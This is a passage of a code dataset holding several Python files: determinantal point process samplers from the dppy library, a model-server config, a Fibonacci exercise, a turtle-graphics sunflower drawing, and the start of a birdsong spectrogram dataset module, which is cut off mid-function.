projection matrix.\n# \tIt sequentially updates the Schur complement by updating the inverse of the matrix involved.\n# \t:param K:\n# \t\tOrthogonal projection kernel.\n# \t:type K:\n# \t\tarray_type\n# \t:param k:\n# \t\tSize of the sample.\n# \t\tDefault is :math:`k=\\operatorname{Tr}(K)=\\operatorname{rank}(K)`.\n# \t:type k:\n# \t\tint\n\n# \t:return:\n# \t\tIf ``k`` is not provided (None),\n# \t\t\tA sample from :math:`\\operatorname{DPP}(K)`.\n# \t\tIf ``k`` is provided,\n# \t\t\tA sample from :math:`\\operatorname{k-DPP}(K)`.\n# \t:rtype:\n# \t\tlist\n# \t.. seealso::\n# \t\t- :func:`projection_dpp_sampler_GS_bis `\n# \t\"\"\"\n\n# \t# Size of the ground set\n# \tN = K.shape[0]\n# \t# Maximal size of the sample: Tr(K)=rank(K)\n# \tr = int(np.round(np.trace(K)))\n# \t# Size of the sample = k\n# \tif k is None: # Full projection DPP\n# \t\tk=r\n# \t# else k-DPP(K) with K orthogonal projection\n\n# \t# Initialization\n# \tground_set, rem_set = np.arange(N), np.full(N, True)\n# \t# Sample\n# \tY = []\n\n# \tK_diag = K.diagonal() # Used to compute the first term of Schur complement\n# \tschur_comp = K_diag.copy() # Initialize the f\n\n# \tfor it in range(k):\n# \t\tprint(np.sum(schur_comp)/(r-it))\n# \t\t# Pick a new item\n# \t\tj = np.random.choice(ground_set[rem_set],\n# \t\t\t\t\t\t\t\t\t\t\t\tsize=1,\n# \t\t\t\t\t\t\t\t\t\t\t\tp=np.fabs(schur_comp[rem_set])/(r-it))[0]\n\n# \t\t#### Update Schur complements K_ii - K_iY (K_Y)^-1 K_Yi for Y <- Y+j\n# \t\t#\n# \t\t# 1) use Woodbury identity to update K[Y,Y]^-1 to K[Y+j,Y+j]^-1\n# \t\t# K[Y+j,Y+j]^-1 =\n# \t\t# [ K[Y,Y]^-1 + (K[Y,Y]^-1 K[Y,j] K[j,Y] K[Y,Y]^-1)/schur_j -K[Y,Y]^-1 K[Y,j]/schur_j]\n# \t\t# [ -K[j,Y] K[Y,Y]^-1/schur_j 1/schur_j ]\n\n# \t\tif it == 0:\n# \t\t\tK_inv=1.0/K[j,j]\n# \t\telif i == 1:\n# \t\t\tK_inv=np.array([[K[j,j], -K[j,Y]], [-K[j,Y], K[Y,Y]]])\\\n# \t\t\t\t\t\t/(K[Y,Y]*K[j,j]-K[j,Y]**2)\n# \t\telse:\n# \t\t\tschur_j = K[j,j] - K[j,Y].dot(K_inv.dot(K[Y,j]))\n# \t\t\ttemp = K_inv.dot(K[Y,j])\n\n# \t\t\tK_inv = np.lib.pad(K_inv, (0,1), 'constant', constant_values=1.0/schur_j)\n\n# \t\t\tK_inv[:-1,:-1] += np.outer(temp, temp/schur_j)\n# \t\t\tK_inv[:-1,-1] *= -temp\n# \t\t\tK_inv[-1,:-1] = K_inv[:-1,-1]\n# \t\t\t# K_inv[-1,-1] = 1.0/schur_j\n\n# \t\t# Add the item to the sample\n# \t\trem_set[j] = False\n# \t\tY.append(j)\n\n# \t\t# 2) update Schur complements\n# \t\t# 
K_ii - K_iY (K_Y)^-1 K_Yi for Y <- Y+j\n# \t\tschur_comp[rem_set] = K_diag[rem_set]\\\n# \t\t\t\t\t\t\t\t\t\t\t\t\t- np_inner1d(K[np.ix_(rem_set,Y)],\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tK[np.ix_(rem_set,Y)].dot(K_inv))\n\n# \treturn Y\n\n\n######################\n### Generic kernel ###\n######################\n\ndef dpp_sampler_eig(eig_vecs_sel, mode=\"GS\"):\n\t\"\"\"\n\t.. seealso::\n\n\t\tPhase 1:\n\n\t\t- :func:`dpp_eig_vecs_selector `\n\t\t- :func:`dpp_eig_vecs_selector_gram_factor `\n\n\t\tPhase 2:\n\n\t\t- :func:`proj_dpp_sampler_eig_GS `\n\t\t- :func:`proj_dpp_sampler_eig_GS_bis `\n\t\t- :func:`proj_dpp_sampler_eig_KuTa12 `\n\t\"\"\"\n\n\tif eig_vecs_sel.shape[1]:\n\t#### Phase 2: Sample from projection kernel VV.T\n\t# Chain rule, conditionals are updated using:\n\t\tif mode == \"GS\": # Gram-Schmidt\n\t\t\tsampl = proj_dpp_sampler_eig_GS(eig_vecs_sel)\n\n\t\telif mode == \"GS_bis\": # Slight modif of \"GS\"\n\t\t\tsampl = proj_dpp_sampler_eig_GS_bis(eig_vecs_sel)\n\n\t\telif mode == \"KuTa12\": # cf Kulesza-Taskar\n\t\t\tsampl = proj_dpp_sampler_eig_KuTa12(eig_vecs_sel)\n\n\t\telse:\n\t\t\tstr_list = [\"Invalid 'mode' parameter, choose among:\",\n\t\t\t\t\t\t\t\t\t\"- 'GS' (default)\",\n\t\t\t\t\t\t\t\t\t\"- 'GS_bis'\",\n\t\t\t\t\t\t\t\t\t\"- 'KuTa12'\",\n\t\t\t\t\t\t\t\t\t\"Given 'mode' = {}\".format(mode)]\n\t\t\traise ValueError(\"\\n\".join(str_list))\n\telse:\n\t\tsampl = []\n\n\treturn sampl\n\n##### Phase 1\n\ndef dpp_eig_vecs_selector(ber_params, eig_vecs):\n\t\"\"\" Subsample eigenvectors :math:`V` of the initial kernel (inclusion :math:`K`, resp. marginal :math:`L`) to build a projection DPP with kernel :math:`V V^{\\top}` from which sampling is easy.\n\tThe selection is made based a realization of Bernoulli variables with parameters related to the eigenvalues of :math:`K`, resp. :math:`L`.\n\n\t:param ber_params:\n\t\tParameters of Bernoulli variables:\n\t\t.. math::\n\n\t\t\t\\lambda^K=\\lambda^L/(1+\\lambda^L)\n\t:type ber_params:\n\t\tlist, array_type\n\n\t:param eig_vecs:\n\t\tCollection of eigenvectors of the kernel :math:`K`, resp. :math:`L`\n\t:type eig_vecs:\n\t\tarray_type\n\n\t:return:\n\t\tselected eigenvectors\n\t:rtype:\n\t\tarray_type\n\n\t.. seealso::\n\n\t\t- :func:`dpp_sampler_eig `\n\t\"\"\"\n\n\t# Realisation of Bernoulli random variables with params ber_params\n\tind_sel = np.random.rand(len(ber_params)) < ber_params\n\n\treturn eig_vecs[:,ind_sel]\n\n\ndef dpp_eig_vecs_selector_L_dual(eig_vals, eig_vecs, gram_factor):\n\t\"\"\" Subsample eigenvectors :math:`V` of marginal kernel :math:`L=\\Phi \\Phi^{\\top}` based on the eigendecomposition dual kernel :math:`L'=\\Phi \\Phi^{\\top}`.\n\n\t:param eig_vals:\n\t\tCollection of eigenvalues of :math:`L` or :math:`L_dual` kernel.\n\t:type eig_vals:\n\t\tlist, array_type\n\n\t:param eig_vecs:\n\t\tCollection of eigenvectors of :math:`L_dual` kernel.\n\t:type eig_vecs:\n\t\tarray_type\n\n\t:param gram_factor:\n\t\tFeature vectors\n\t:type gram_factor:\n\t\tarray_type\n\n\t:return:\n\t\tselected eigenvectors\n\t:rtype:\n\t\tarray_type\n\n\t.. 
seealso::\n\n\t\tPhase 1:\n\n\t\t- :func:`dpp_eig_vecs_selector `\n\n\t\tPhase 2:\n\n\t\t- :func:`proj_dpp_sampler_eig_GS `\n\t\t- :func:`proj_dpp_sampler_eig_GS_bis `\n\t\t- :func:`proj_dpp_sampler_eig_KuTa12 `\n\t\"\"\"\n\n\t# Realisation of Bernoulli random variables with params eig_vals\n\tind_sel = np.random.rand(len(eig_vals)) < eig_vals/(1.0+eig_vals)\n\n\treturn gram_factor.T.dot(eig_vecs[:,ind_sel]/np.sqrt(eig_vals[ind_sel]))\n\n##### Phase 2\n\n# Using Gram-Schmidt orthogonalization\ndef proj_dpp_sampler_eig_GS(eig_vecs, size=None):\n\t\"\"\" Sample from projection :math:`\operatorname{DPP}(K)` using the eigendecomposition of the projection kernel :math:`K=VV^{\top}` where :math:`V^{\top}V = I`.\n\tIt performs sequential update of Cholesky decomposition, which is equivalent to Gram-Schmidt orthogonalization of the rows of the eigenvectors.\n\n\t:param eig_vecs:\n\t\tEigenvectors used to form projection kernel :math:`K=VV^{\top}`.\n\t:type eig_vecs:\n\t\tarray_type\n\n\t:return:\n\t\tA sample from projection :math:`\operatorname{DPP}(K)`.\n\t:rtype:\n\t\tlist, array_type\n\n\t.. seealso::\n\n\t\t- :func:`proj_dpp_sampler_eig_GS_bis `\n\t\t- :func:`proj_dpp_sampler_eig_KuTa12 `\n\t\"\"\"\n\n\t##### Phase 1 (eigenvector selection via Bernoulli draws on the eigenvalues) happens upstream\n\n\tV = eig_vecs # Eigenvectors\n\tN, rank = V.shape\n\n\t# Size of the sample\n\tif size is None:\n\t\tsize = rank # Full projection DPP\n\telse:\n\t\tpass # projection k-DPP\n\n\tground_set, rem_set = np.arange(N), np.full(N, True)\n\tY = [] # sample\n\n\t##### Phase 2: Chain rule\n\t# To compute the squared volume of the parallelepiped spanned by the feature vectors defining the sample\n\t# use Gram-Schmidt recursion aka Base x Height formula.\n\n\t# Initially this corresponds to the squared norm of the feature vectors\n\tc = np.zeros((N, size))\n\tnorms_2 = np_inner1d(V, V)\n\n\tfor it in range(size):\n\n\t\t# Pick an item \propto this squared distance\n\t\tj = np.random.choice(ground_set[rem_set],\n\t\t\t\t\t\t\t\t\t\t\t\tsize=1,\n\t\t\t\t\t\t\t\t\t\t\t\tp=np.fabs(norms_2[rem_set])/(rank-it))[0]\n\n\t\t# Add the item just picked\n\t\trem_set[j] = False\n\t\tY.append(j)\n\n\t\t# Cancel the contribution of V_j to the remaining feature vectors\n\t\tc[rem_set, it] = V[rem_set,:].dot(V[j,:]) - c[rem_set,:it].dot(c[j,:it])\n\t\tc[rem_set, it] /= np.sqrt(norms_2[j])\n\n\t\t# Compute the squared distance of the feature vectors to Span(V_Y)\n\t\tnorms_2[rem_set] -= c[rem_set,it]**2\n\n\treturn Y\n\n\n# Slight modification of the Gram-Schmidt sampler above\ndef proj_dpp_sampler_eig_GS_bis(eig_vecs, size=None):\n\t\"\"\" Sample from projection :math:`\operatorname{DPP}(K)` using the eigendecomposition of the projection kernel :math:`K=VV^{\top}` where :math:`V^{\top}V = I`.\n\tIt performs sequential Gram-Schmidt orthogonalization of the rows of the eigenvectors.\n\n\t:param eig_vecs:\n\t\tEigenvectors used to form projection kernel :math:`K=VV^{\top}`.\n\t:type eig_vecs:\n\t\tarray_type\n\n\t:return:\n\t\tA sample from projection :math:`\operatorname{DPP}(K)`.\n\t:rtype:\n\t\tlist, array_type\n\n\t.. 
seealso::\n\n\t\t- This is a slight modification of :func:`proj_dpp_sampler_eig_GS `\n\t\t- :func:`proj_dpp_sampler_eig_KuTa12 `\n\t\"\"\"\n\n\tV = eig_vecs # Eigenvectors\n\tN, rank = V.shape\n\t# Size of the sample\n\tif size is None:\n\t\tsize = rank # Full projection DPP\n\telse:\n\t\tpass # projection k-DPP\n\tground_set, rem_set = np.arange(N), np.full(N, True)\n\tY = [] # sample\n\n\t##### Phase 2: Chain rule\n\t# To compute the squared volume of the parallelepiped spanned by the feature vectors defining the sample\n\t# use Gram-Schmidt recursion aka Base x Height formula.\n\n\t### Matrix of the contribution of remaining vectors V_i onto the orthonormal basis {e_j}_Y of V_Y\n\t# \n\tcontrib = np.zeros((N, size))\n\n\t### Residual square norm\n\t# ||P_{V_Y}^{orthog} V_j||^2\n\tnorms_2 = np_inner1d(V, V)\n\n\tfor it in range(size):\n\n\t\t# Pick an item proportionally to the residual square norm\n\t\t# ||P_{V_Y}^{orthog} V_j||^2\n\t\tj = np.random.choice(ground_set[rem_set],\n\t\t\t\t\t\t\t\t\t\t\t\tsize=1,\n\t\t\t\t\t\t\t\t\t\t\t\tp=np.fabs(norms_2[rem_set])/(rank-it))[0]\n\n\t\t### Update the residual square norm\n\t\t#\n\t\t# |P_{V_Y+j}^{orthog} V_i|^2\n\t\t# ^2\n\t\t# = |P_{V_Y}^{orthog} V_i|^2 - ----------------------------\n\t\t# |P_{V_Y}^{orthog} V_j|^2\n\n\n\t\t## 1) Orthogonalize V_j w.r.t. orthonormal basis of Span(V_Y)\n\t\t# V'_j = P_{V_Y}^{orthog} V_j\n\t\t# = V_j - V\"_k\n\t\t# Note V'_j is not normalized\n\t\tV[j,:] -= contrib[j,:it].dot(V[Y,:])\n\n\t\t# Make the item selected unavailable\n\t\trem_set[j] = False\n\t\t# Add the item to the sample\n\t\tY.append(j)\n\n\t\t## 2) Compute = \n\t\tcontrib[rem_set,it] = V[rem_set,:].dot(V[j,:])\n\n\t\t## 3) Normalize V'_j with norm^2 and not norm\n\t\t# V'_j P_{V_Y}^{orthog} V_j\n\t\t# V\"_j = ------- = --------------------------\n\t\t# |V'j|^2 |P_{V_Y}^{orthog} V_j|^2\n\t\tV[j,:] /= norms_2[j]\n\t\t# for next orthogonalization in 1)\n\t\t# \t P_{V_Y}^{orthog} V_j\n\t\t# V_i - V\"_j = V_i - -----------------------------------------\n\t\t# |P_{V_Y}^{orthog} V_j|^2\n\n\n\t\t## 4) Update the residual square norm by cancelling the contribution of V_i onto V_j\n\t\t#\n\t\t# |P_{V_Y+j}^{orthog} V_i|^2\n\t\t#\t\t= |P_{V_Y}^{orthog} V_i|^2 - ^2 / |V'j|^2\n\t\t#\n\t\t# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t^2\n\t\t# = |P_{V_Y}^{orthog} V_i|^2 -\t\t----------------------------\n\t\t# |P_{V_Y}^{orthog} V_j|^2\n\n\t\tnorms_2[rem_set] -= (contrib[rem_set,it]**2)/norms_2[j]\n\n\treturn Y\n\n\ndef proj_dpp_sampler_eig_KuTa12(eig_vecs, size=None):\n\t\"\"\" Sample from :math:`\\operatorname{DPP}(K)` using the eigendecomposition of the similarity kernel :math:`K`.\n\tIt is based on the orthogonalization of the selected eigenvectors.\n\n\t:param eig_vals:\n\t\tCollection of eigen values of the similarity kernel :math:`K`.\n\t:type eig_vals:\n\t\tlist\n\n\t:param eig_vecs:\n\t\tEigenvectors of the similarity kernel :math:`K`.\n\t:type eig_vecs:\n\t\tarray_type\n\n\t:return:\n\t\tA sample from :math:`\\operatorname{DPP}(K)`.\n\t:rtype:\n\t\tlist\n\n\t.. 
seealso::\n\n\t\t- Algorithm 1 in :cite:`KuTa12`\n\t\t- :func:`proj_dpp_sampler_eig_GS `\n\t\t- :func:`proj_dpp_sampler_eig_GS_bis `\n\t\"\"\"\n\n\t# N = size of the ground set, n = size of the sample\n\tV = eig_vecs\n\tN, rank = V.shape\n\t# Size of the sample\n\tif size is None:\n\t\tsize = rank # Full projection DPP\n\telse:\n\t\tpass # projection k-DPP\n\tY = [] # sample\n\n\t#### Phase 2: Chain rule\n\t# Initialize the sample\n\tnorms_2 = np_inner1d(V,V)\n\t# Pick an item\n\ti = np.random.choice(N, size=1, p=np.fabs(norms_2)/rank)[0]\n\t# Add the item just picked\n\tY.append(i) # sample\n\n\t# Following [Algo 1, KuTa12], the aim is to compute the orthogonal complement, within the span of the selected eigenvectors, of the canonical vectors \{e_i ; i \in Y\}. We proceed recursively.\n\tfor it in range(1, size):\n\n\t\t# Cancel the contribution of e_i to the remaining vectors, that is, find the subspace of V that is orthogonal to \{e_i ; i \in Y\}\n\n\t\t# Take the index of a vector that has a non-null contribution along e_i\n\t\tj = np.where(V[i,:]!=0)[0][0]\n\t\t# Cancel the contribution of the remaining vectors along e_i, but stay in the subspace spanned by V i.e. get the subspace of V orthogonal to \{e_i ; i \in Y\}\n\t\tV -= np.outer(V[:,j]/V[i,j], V[i,:])\n\t\t# V_:j is set to 0 so we delete it and we can derive an orthonormal basis of the subspace under consideration\n\t\tV, _ = la.qr(np.delete(V, j, axis=1), mode=\"economic\")\n\n\t\tnorms_2 = np_inner1d(V, V)\n\t\t# Pick an item\n\t\ti = np.random.choice(N, size=1, p=np.fabs(norms_2)/(rank-it))[0]\n\t\t# Add the item just picked\n\t\tY.append(i)\n\n\treturn Y\n\n\n##########################################\n################# k-DPPs #################\n##########################################\n\ndef k_dpp_sampler(kernel, size, proj_kernel=False, mode=\"GS\"):\n\t\"\"\" Sample from :math:`\operatorname{k-DPP}(K)`, where :math:`K` is real symmetric with eigenvalues in :math:`[0,1]`.\n\n\t:param kernel: Real symmetric kernel with eigenvalues in :math:`[0,1]`\n\t:type kernel:\n\t\tarray_type\n\n\t:param size:\n\t\tSize of the sample.\n\t:type size:\n\t\tint\n\n\t:param proj_kernel:\n\t\tIndicate :math:`K` is an orthogonal projection kernel.\n\t\tIf ``proj_kernel=True``, diagonalization of :math:`K` is not necessary, thus not performed.\n\t:type proj_kernel:\n\t\tbool, default 'False'\n\n\t:param mode:\n\t\tIndicate how the conditional probabilities i.e. the ratio of 2 determinants must be updated.\n\n\t\tIf ``proj_kernel=True``:\n\t\t\t- \"GS\" (default): Gram-Schmidt on the columns of :math:`K`\n\t\t\t# - \"Schur\": Schur complement updates\n\n\t\tIf ``proj_kernel=False``:\n\t\t\t- \"GS\" (default): Gram-Schmidt on the rows of the selected eigenvectors, equivalent to Cholesky updates\n\t\t\t- \"GS_bis\": Slight modification of \"GS\"\n\t\t\t- \"KuTa12\": Algorithm 1 in :cite:`KuTa12`\n\t:type mode:\n\t\tstring, default 'GS'\n\n\t:return:\n\t\tA sample from :math:`\operatorname{k-DPP}(K)`.\n\t:rtype:\n\t\tlist\n\n\t.. seealso::\n\n\t\t- :func:`proj_k_dpp_sampler `\n\t\t- :func:`k_dpp_sampler_eig `\n\t\"\"\"\n\n\tif proj_kernel:\n\t\tsampl = proj_k_dpp_sampler_kernel(kernel, size, mode)\n\n\telse:\n\t\t# scipy.linalg.eigh returns (eigenvalues, eigenvectors), in that order\n\t\teig_vals, eig_vecs = la.eigh(kernel)\n\t\tsampl = k_dpp_sampler_eig(eig_vals, eig_vecs, size, mode)\n\n\treturn sampl\n\n#########################\n### Projection kernel ###\n#########################\ndef proj_k_dpp_sampler_kernel(kernel, size, mode=\"GS\"):\n\t\"\"\"\n\t\t.. 
seealso::\n\t\t\t- :func:`proj_dpp_sampler_kernel_GS_bis `\n\t\t\t# - :func:`proj_dpp_sampler_kernel_Schur `\n\t\"\"\"\n\n\t#### Phase 1: Select eigenvectors\n\t# No need for eigendecomposition\n\n\t#### Phase 2: Sample from orthogonal projection kernel K = K^2 = K.T K\n\t# Chain rule, conditionals are updated using:\n\tif mode == \"GS\": # Gram-Schmidt equiv Cholesky\n\t\tsampl = proj_dpp_sampler_kernel_GS(kernel, size)\n\n\t# elif mode == \"Shur\": # Schur complement\n\t# \tsampl = proj_dpp_sampler_kernel_Schur(kernel, size)\n\n\telse:\n\t\tstr_list = [\"Invalid 'mode' parameter, choose among:\",\n\t\t\t\t\t\t\t\t\"- 'GS' (default)\",\n\t\t\t\t\t\t\t\t# \"- 'Schur'\",\n\t\t\t\t\t\t\t\t\"Given 'mode' = {}\".format(mode)]\n\t\traise ValueError(\"\\n\".join(str_list))\n\n\treturn sampl\n\n#######################################################\n# From the eigen decomposition of the kernel :math:`K`\n\n######################\n### Generic kernel ###\n######################\n\ndef k_dpp_sampler_eig(eig_vals, eig_vecs, size, mode=\"GS\",\n\t\t\t\t\t\t\t\t\t\t\tel_sym_pol_eval=None):\n\t\"\"\"\n\t\t.. seealso::\n\n\t\t\tPhase 1:\n\n\t\t\t- :func:`k_dpp_eig_vecs_selector `\n\n\t\t\tPhase 2:\n\n\t\t\t- :func:`proj_dpp_sampler_eig_GS_bis `\n\t\t\t- :func:`proj_dpp_sampler_eig_GS `\n\t\t\t- :func:`proj_dpp_sampler_eig_KuTa12 `\n\t\"\"\"\n\t#### Phase 1: Select eigenvectors\n\teig_vecs_sel = k_dpp_eig_vecs_selector(eig_vals, eig_vecs, size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tel_sym_pol_eval)\n\n\t#### Phase 2: Sample from projection kernel VV.T\n\t# Chain rule, conditionals are updated using:\n\n\tif mode == \"GS\": # Gram-Schmidt\n\t\tsampl = proj_dpp_sampler_eig_GS(eig_vecs_sel)\n\n\telif mode == \"GS_bis\": # Slight modif of \"GS\"\n\t\tsampl = proj_dpp_sampler_eig_GS_bis(eig_vecs_sel)\n\n\telif mode == \"KuTa12\": # cf Kulesza-Taskar\n\t\tsampl = proj_dpp_sampler_eig_KuTa12(eig_vecs_sel)\n\n\telse:\n\t\tstr_list = [\"Invalid 'mode' parameter, choose among:\",\n\t\t\t\t\t\t\t\t\"- 'GS' (default)\",\n\t\t\t\t\t\t\t\t\"- 'GS_bis'\",\n\t\t\t\t\t\t\t\t\"- 'KuTa12'\",\n\t\t\t\t\t\t\t\t\"Given 'mode' = {}\".format(mode)]\n\t\traise ValueError(\"\\n\".join(str_list))\n\n\treturn sampl\n\ndef k_dpp_eig_vecs_selector(eig_vals, eig_vecs, size, el_sym_pol_eval=None):\n\t\"\"\" Subsample eigenvectors V of the initial kernel ('K' or equivalently 'L') to build a projection DPP with kernel V V.T from which sampling is easy. The selection is made based a realization of Bernoulli variables with parameters the eigenvalues of 'K'.\n\n\t:param eig_vals:\n\t\tCollection of eigen values of 'K' (inclusion) kernel.\n\t:type eig_vals:\n\t\tlist, array_type\n\n\t:param eig_vecs:\n\t\tCollection of eigenvectors of 'K' (or equiv 'L') kernel.\n\t:type eig_vals:\n\t\tarray_type\n\n\t:return:\n\t\tSelected eigenvectors\n\t:rtype:\n\t\tarray_type\n\n\t.. 
seealso::\n\n\t\tAlgorithm 8 in :cite:`KuTa12`\n\t\"\"\"\n\n\t# Size of the ground set\n\tnb_items = eig_vecs.shape[0]\n\n\t# Evaluate the elem symm polys in the eigenvalues\n\tif el_sym_pol_eval is None:\n\t\tE = elem_symm_poly(eig_vals, size)\n\telse:\n\t\tE = el_sym_pol_eval\n\n\tind_selected = []\n\tfor n in range(nb_items,0,-1):\n\t\tif size == 0:\n\t\t\tbreak\n\n\t\tif np.random.rand() < eig_vals[n-1]*(E[size-1, n-1]/E[size, n]):\n\t\t\tind_selected.append(n-1)\n\t\t\tsize -= 1\n\n\treturn eig_vecs[:, ind_selected]\n\n# Evaluate the elementary symmetric polynomials\ndef elem_symm_poly(eig_vals, size):\n\t\"\"\" Evaluate the elementary symmetric polynomials in the eigenvalues.\n\n\t:param eig_vals:\n\t\tCollection of eigen values of the similarity kernel :math:`K`.\n\t:type eig_vals:\n\t\tlist\n\n\t:param size:\n\t\tMaximum degree of elementary symmetric polynomial.\n\t:type size:\n\t\tint\n\n\t:return:\n\t\tpoly(size, N) = :math:`e_size(\\lambda_1, \\cdots, \\lambda_N)`\n\t:rtype:\n\t\tarray_type\n\n\t.. seealso::\n\n\t\tAlgorithm 7 in :cite:`KuTa12`\n\t\"\"\"\n\n\t# Number of variables for the elementary symmetric polynomials to be evaluated\n\tN = eig_vals.shape[0]\n\t# Initialize output array\n\tpoly = np.zeros((size+1, N+1))\n\tpoly[0, :] = 1\n\n\t# Recursive evaluation\n\tfor l in range(1, size+1):\n\t\tfor n in range(1, N+1):\n\t\t\tpoly[l, n] = poly[l, n-1] + eig_vals[n-1] * poly[l-1, n-1]\n\n\treturn poly","sub_path":"dppy/exact_sampling.py","file_name":"exact_sampling.py","file_ext":"py","file_size_in_byte":22754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
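The recursion in `elem_symm_poly` is `e_l(λ_1..λ_n) = e_l(λ_1..λ_{n-1}) + λ_n · e_{l-1}(λ_1..λ_{n-1})`, so `poly[k, N]` holds `e_k` of all N eigenvalues. It can be sanity-checked against a brute-force sum over subsets; a small test sketch, assuming `elem_symm_poly` above is in scope:

```python
import itertools
import numpy as np

def elem_symm_poly_bruteforce(eig_vals, size):
    # e_k = sum over all k-subsets of the product of their entries
    return [sum(np.prod(c) for c in itertools.combinations(eig_vals, k))
            for k in range(size + 1)]

eig_vals = np.array([0.2, 0.5, 0.9, 1.0])
E = elem_symm_poly(eig_vals, size=2)
ref = elem_symm_poly_bruteforce(eig_vals, size=2)
for k in range(3):
    assert np.isclose(E[k, len(eig_vals)], ref[k])
# e_0 = 1, e_1 = 2.6, e_2 = 2.33 for these eigenvalues
```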
+{"seq_id":"74252840","text":"from types import SimpleNamespace\nimport os\n\nAPI_SERVER_OPTIONS = ['flask', 'falcon']\nAPI_SERVER = SimpleNamespace(\n type=os.getenv('SERVER_TYPE', API_SERVER_OPTIONS[1]).lower(),\n port=8000,\n host='0.0.0.0',\n debug=False,\n endpoint=os.getenv('ENDPOINT', 'predict'),\n model_path=os.getenv(\n 'SAVED_MODEL_PATH',\n 'srv/models/efficientdet_d3_coco17_tpu-32/saved_model'\n )\n)\nassert API_SERVER.type in API_SERVER_OPTIONS\n","sub_path":"api/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"105430659","text":"# Задача 5\n#\n# Последовательность Фиббоначи определена реккурентным соотношением\n# Fn = Fn-1 + Fn-2,\n# где F1 = 1 и F2 = 1\n#\n# Первые 12 членов последовательности будут такими:\n# F1=1,\n# F2=1,\n# F3=2,\n# F4=3,\n# F5=5,\n# F6=8,\n# F7=13,\n# F8=21,\n# F9=34,\n# F10=55,\n# F11=89,\n# F12=144\n\n# Можно увидеть, что 12-ый член последовательности - первый, состоящий из трех цифр.\n#\n# Найдите номер первого члена последовательности Фиббоначи, такого, что число цифр в нём равно 1139.\n\ndef fib(n):\n a = 0\n b = 1\n for __ in range(n):\n a, b = b, a + b\n return a\n\nn = 0\nwhile True:\n if len(str(fib(n))) == 1139:\n print(n)\n break\n n += 1\n","sub_path":"problem5.py","file_name":"problem5.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"405839228","text":"''' \n Author: Kent D. Lee\n Date: 9/26/2014\n Copyright (c) 2014\n Free for educational use. Others may use with permission.\n\n Source: \n\n I used http://fractalfoundation.org/OFC/OFC-11-3.html as a source for this \n information. \n \n Description:\n \n This program draws sunflower seeds in the pattern of a funflower. The ration of \n consecutive fibonacci numbers in the sequence approach the golden ratio as the \n sequence grows. In the limit, the ratio of two consecutive fibonacci numbers is\n the golden ratio. \n \n In the sunflower fibonacci numbers can be observed by counting the number of seeds\n in the spiral arms. Count the number of seeds in a left spiral arm and a right spiral\n arm. You'll see that they are two fibonacci numbers. \n \n You may have to make the radius size of the seeds constant to count the seeds. It won't\n look as pretty, but will be easier to count. You may also need to increase the forward \n to separate the seeds. \n'''\n\nimport turtle\nimport math\n\n\nclass Circle:\n def __init__(self,radius, width=1,color=\"white\",outline=\"black\"):\n self.radius = radius\n self.width = width\n self.color = color\n self.outline = outline\n \n def draw(self,turtle):\n centerX = turtle.xcor()\n centerY = turtle.ycor()\n turtle.penup()\n turtle.goto(centerX+self.radius,centerY)\n turtle.pendown()\n turtle.width(self.width)\n turtle.pencolor(self.outline)\n turtle.fillcolor(self.color)\n turtle.begin_fill()\n for i in range(361):\n newX = self.radius * math.cos((i/180.0) * math.pi) + centerX\n newY = self.radius * math.sin((i/180.0) * math.pi) + centerY\n turtle.goto(newX,newY)\n \n turtle.end_fill()\n turtle.penup()\n turtle.goto(centerX, centerY)\n turtle.pendown()\n \ndef main():\n \n t = turtle.Turtle()\n t.ht()\n screen = t.getscreen()\n screen.tracer(0)\n \n for x in range(400):\n c = Circle(x/16+4,width=2,color=\"yellow\")\n c.draw(t)\n # This angle is chosen because it is approx.\n # 360/1.61803399. The 1.61803399 is the approx.\n # value of the golden angle\n t.left(222.5)\n t.penup()\n t.forward(x*2 + 8)\n screen.update()\n \n \n \n screen.exitonclick()\n \nif __name__ == \"__main__\":\n main()","sub_path":"build/html/_downloads/6dacc553883d61ea20cd3a8ea33ee034/sunflower.py","file_name":"sunflower.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"75104465","text":"\"\"\"Dataset for birdsongs.\"\"\"\n\n__author__ = \"Jack Goffinet\"\n__date__ = \"April 2019\"\n\n\nfrom os import listdir, sep\nfrom os.path import join\nimport random\n\nimport h5py\n\nimport numpy as np\nfrom scipy.signal import stft\nfrom scipy.interpolate import interp1d\nfrom skimage.transform import resize\n\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms\n\n\nEPSILON = 1e-9\n\n\ndef get_partition(dirs, split):\n\t\"\"\"\n\n\t\"\"\"\n\tassert split > 0.0 and split <= 1.0, \"Invalid split: \"+str(split)\n\tfilenames = []\n\tfor dir in dirs:\n\t\tfilenames += [join(dir, i) for i in listdir(dir) if i[-5:] == '.hdf5']\n\tnp.random.seed(42)\n\tnp.random.shuffle(filenames)\n\tnp.random.seed(None)\n\tindex = int(round(split * len(filenames)))\n\treturn {'train': filenames[:index], 'test': filenames[index:]}\n\n\ndef get_spec(audio, start_frame, stop_frame, p, fs):\n\t\"\"\"Get a spectrogram.\"\"\"\n\tf, t, spec = stft(audio[start_frame:stop_frame], fs=fs)\n\tspec = np.log(np.abs(spec) + EPSILON)\n\tspec -= p['spec_thresh']\n\tspec[spec < 0.0] = 0.0\n\t# Switch to mel frequency spacing.\n\tif p['mel']:\n\t\tnew_f = np.linspace(mel(p['min_freq']), mel(p['max_freq']), p['num_freq_bins'], endpoint=True)\n\t\tnew_f = inv_mel(new_f)\n\t\tnew_f[0] = f[0] # Correct for numerical errors.\n\t\tnew_f[-1] = f[-1]\n\telse:\n\t\tnew_f = np.linspace(p['min_freq'], p['max_freq'], p['num_freq_bins'], endpoint=True)\n\tnew_spec = np.zeros((p['num_freq_bins'], spec.shape[1]), dtype='float')\n\tfor j in range(spec.shape[1]):\n\t\tinterp = interp1d(f, spec[:,j], kind='cubic')\n\t\tnew_spec[:,j] = interp(new_f)\n\tnew_spec = resize(new_spec, (p['num_freq_bins'], p['num_time_bins']), 